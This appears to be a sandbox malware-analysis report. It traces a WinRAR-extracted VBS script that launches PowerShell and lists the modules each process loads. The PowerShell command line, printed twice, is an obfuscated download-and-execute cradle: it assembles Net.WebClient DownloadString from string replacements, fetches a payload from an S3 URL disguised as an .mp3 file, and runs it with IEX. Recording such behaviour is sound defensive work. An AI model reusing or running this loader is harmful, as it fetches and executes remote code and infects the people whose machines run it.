c:\windows\system32\crypt32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\usp10.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\webio.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\setupapi.dll

PID
3352
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#>System.Threading.Thread<#332582934080410965342560428418888379619956774943186044163478065547816208676717123690088264390539329#>]::Sleep(885557335194378991089635452410767445166130872137768064703175998831933835909392882813125872937454823);[<#881226574524467035756739689555252751625644928374972474814545552314681526844644513224919051730462161#>System.Threading.Thread<#544462906549900783721356981687314308695583891908023026103953193714290957895846672145227083480734405#>]::Sleep(361720056294770100834534979450663059629730671111794807664607425254769988602043428691349785043126617); $CMcmCLk='(New-';<#104287626038522532610194239851465902448853701335375449476793672258465401850339040992324545446048459#>$cRFZNFU<#908573536026652706339700453607594375571856550901775514836009707493001619461840490399262830314387938#> = 'FcToZba '.Replace('FcToZba','Object');<#330353833174427751061035914351580963843522738065878517819591677731953794999980608218653696559937714#>$tunbltM<#510534477852060853107530118032801301936831658882015175756738686695181667993386351153760457677069284#> = '8623093'.Replace('8623093','Net');$OjDWcdg<#250153126874169582138590232886165222377226929185100191881138388816950390888455167652398373025963315#> = 'duJIsbq'.Replace('duJIsbq','.We');$aKnyylX<#811227991280465912278007551837915671316795971627264870415149471449000404660551561917010286586543568#>='foYRetD '.Replace('foYRetD ','.Downlo');$eidNRbT<#013641744223997255744180918329689968004206360691223920434528726286866310075938732447216203341918429#> = 'OkwZafA'.Replace('OkwZafA','bClient)');[<#308193005475249696351229526676061814607011810057109098409289623130464751615114043683514601550262909#>System.Threading.Thread<#902792029052939860872955749761206506718699305169510257485179048122204793237260241766664687353202368#>]::Sleep(<#998380067313436303362194097464034126273445792407246032775071979484995426295600923067080962795188093#>2000<#306438298499538272654651829335211203279325447707873228998889919131044184735514588168317138005210002#>);<#397309945173855672384369450171872647247418566780208998484776911630098243134646914394900937122996535#>$lwdbCqP<#861122098562862161152450664323292818299173198171719595638757127350487586127512033064810696604331706#>='nbGEVOQ(''https://v3-fastupload.s3-accelerate.amazonaws.com/1641997458-image.mp3'')'.Replace('nbGEVOQ','adString');<#574641522893469503706150684357854152566314917851986966587273130993946711844822565143772025386674753#>$YZMVZRJ<#580913649042024269864618027802447779658184071440001353417374826065197308245895936293353167738067665#> = <#859303231381657595356127086158365125020366821533646321576606884558276145794642540289686675240587716#>$CMcmCLk,<#224473931473431264133899671659170574129100815631780651892791932502059371018612669863981183229099767#>$cRFZNFU,<#537525641023134406932515911730359194848624175568644706481489934387684505898295125351057833901680598#>$tunbltM,<#994931512654288049079387341385298552491778095342074754662856020905244601549295859288594780472599450#>$OjDWcdg,<#272139064285787471548684516721248839661331983800095166438646025883564114051998577993775691815917716#>$eidNRbT,<#933692313555877725402566668010444187488805377765075380124189245835240499212532827989826782709504664#>$aKnyylX,<#928263178579062698705129928185257046260284778043135775361415045562403230912338619853652391385729508#>$lwdbCqP;<#469573790628029047216945044120987780668442213140254403394682963674813132882216296335298562362700434#>$dnKjCGT<#062725273768547580172901546947299382239023848932508432353358088962523733211666541126164853690307471#> = 'XPJYQCF '.Replace('XPJYQCF ','I`E`X');<#717159288687601820585903060231480539672712265216424710315509299302723408648706012051460270579008883#>$OcQmYlt<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#> = <#286549425252617420261699127529272653659319148715343009731638488938630443882891320112000597665012822#>$dnKjCGT+(<#578221803553221160850493742702662470202483065196220890108137147630188139709755250722276067674687473#>$YZMVZRJ -Join '')|I`E`X;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\imm32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\rsaenh.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\atl.dll
c:\windows\system32\lpk.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\version.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\system32\msisip.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\user32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\shell32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\usp10.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\wshext.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\oleaut32.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\ws2_32.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\nsi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\wship6.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\credssp.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\devobj.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\wscript.exe
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll

PID
3220
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2256.41362\QPRCK498428.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\msasn1.dll
c:\windows\system32\ole32.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\sxs.dll
c:\windows\system32\wscript.exe
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wshext.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\mpr.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msisip.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\propsys.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\userenv.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\webio.dll
c:\windows\system32\wininet.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\profapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\normaliz.dll

PID
976
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#>System.Threading.Thread<#332582934080410965342560428418888379619956774943186044163478065547816208676717123690088264390539329#>]::Sleep(885557335194378991089635452410767445166130872137768064703175998831933835909392882813125872937454823);[<#881226574524467035756739689555252751625644928374972474814545552314681526844644513224919051730462161#>System.Threading.Thread<#544462906549900783721356981687314308695583891908023026103953193714290957895846672145227083480734405#>]::Sleep(361720056294770100834534979450663059629730671111794807664607425254769988602043428691349785043126617); $CMcmCLk='(New-';<#104287626038522532610194239851465902448853701335375449476793672258465401850339040992324545446048459#>$cRFZNFU<#908573536026652706339700453607594375571856550901775514836009707493001619461840490399262830314387938#> = 'FcToZba '.Replace('FcToZba','Object');<#330353833174427751061035914351580963843522738065878517819591677731953794999980608218653696559937714#>$tunbltM<#510534477852060853107530118032801301936831658882015175756738686695181667993386351153760457677069284#> = '8623093'.Replace('8623093','Net');$OjDWcdg<#250153126874169582138590232886165222377226929185100191881138388816950390888455167652398373025963315#> = 'duJIsbq'.Replace('duJIsbq','.We');$aKnyylX<#811227991280465912278007551837915671316795971627264870415149471449000404660551561917010286586543568#>='foYRetD '.Replace('foYRetD ','.Downlo');$eidNRbT<#013641744223997255744180918329689968004206360691223920434528726286866310075938732447216203341918429#> = 'OkwZafA'.Replace('OkwZafA','bClient)');[<#308193005475249696351229526676061814607011810057109098409289623130464751615114043683514601550262909#>System.Threading.Thread<#902792029052939860872955749761206506718699305169510257485179048122204793237260241766664687353202368#>]::Sleep(<#998380067313436303362194097464034126273445792407246032775071979484995426295600923067080962795188093#>2000<#306438298499538272654651829335211203279325447707873228998889919131044184735514588168317138005210002#>);<#397309945173855672384369450171872647247418566780208998484776911630098243134646914394900937122996535#>$lwdbCqP<#861122098562862161152450664323292818299173198171719595638757127350487586127512033064810696604331706#>='nbGEVOQ(''https://v3-fastupload.s3-accelerate.amazonaws.com/1641997458-image.mp3'')'.Replace('nbGEVOQ','adString');<#574641522893469503706150684357854152566314917851986966587273130993946711844822565143772025386674753#>$YZMVZRJ<#580913649042024269864618027802447779658184071440001353417374826065197308245895936293353167738067665#> = <#859303231381657595356127086158365125020366821533646321576606884558276145794642540289686675240587716#>$CMcmCLk,<#224473931473431264133899671659170574129100815631780651892791932502059371018612669863981183229099767#>$cRFZNFU,<#537525641023134406932515911730359194848624175568644706481489934387684505898295125351057833901680598#>$tunbltM,<#994931512654288049079387341385298552491778095342074754662856020905244601549295859288594780472599450#>$OjDWcdg,<#272139064285787471548684516721248839661331983800095166438646025883564114051998577993775691815917716#>$eidNRbT,<#933692313555877725402566668010444187488805377765075380124189245835240499212532827989826782709504664#>$aKnyylX,<#928263178579062698705129928185257046260284778043135775361415045562403230912338619853652391385729508#>$lwdbCqP;<#469573790628029047216945044120987780668442213140254403394682963674813132882216296335298562362700434#>$dnKjCGT<#062725273768547580172901546947299382239023848932508432353358088962523733211666541126164853690307471#> = 'XPJYQCF '.Replace('XPJYQCF ','I`E`X');<#717159288687601820585903060231480539672712265216424710315509299302723408648706012051460270579008883#>$OcQmYlt<#645848699465732105195380287398536904030378238146025604764639984530492547010939664251867247291236916#> = <#286549425252617420261699127529272653659319148715343009731638488938630443882891320112000597665012822#>$dnKjCGT+(<#578221803553221160850493742702662470202483065196220890108137147630188139709755250722276067674687473#>$YZMVZRJ -Join '')|I`E`X;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\mscoree.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\msvcrt.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.transactions\18afe632acb8900be8188ec43a24784d\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
c:\windows\system32\imm32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.numerics\de2a832558f95db343e443c365bd3575\system.numerics.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msisip.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\profapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\system32\ws2_32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\lpk.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.mf49f6405#\f72ae7289194b13172020e33d50f6f38\microsoft.management.infrastructure.ni.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\wshext.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\microsoft.net\framework\v4.0.30319\clrjit.dll
c:\windows\system32\sechost.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\nsi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.configuration\7ece7799d670cdfc1393b98b0668a046\system.configuration.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\microsoft.net\framework\v4.0.30319\diasymreader.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasman.dll
c:\windows\system32\webio.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p521220ea#\8b7fa0532239a80583de711c612815cd\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.confe64a9051#\979591075e378389170a3e094c90b43b\system.configuration.install.ni.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\credssp.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\userenv.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pae3498d9#\e8948a2d96b83812948847619fc784bc\microsoft.powershell.commands.management.ni.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\wscript.exe
c:\windows\system32\wininet.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\apphelp.dll

PID
3680
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2256.41816\QPRCK498428.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\kernel32.dll
c:\windows\system32\wscript.exe
c:\windows\system32\msctf.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\user32.dll
c:\windows\system32\version.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\sxs.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\wshext.dll
c:\windows\system32\msisip.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\mpr.dll
c:\windows\system32\profapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\webio.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\sspicli.dll

PID
3232
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\Public\install.vbs"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft � Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\usp10.dll
c:\windows\system32\version.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\wshom.ocx
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\wshext.dll
c:\windows\system32\profapi.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\msisip.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\wininet.dll
c:\windows\system32\wscript.exe
c:\windows\system32\apphelp.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\sxs.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\mpr.dll
c:\windows\system32\propsys.dll
c:\windows\system32\lpk.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\crypt32.dll
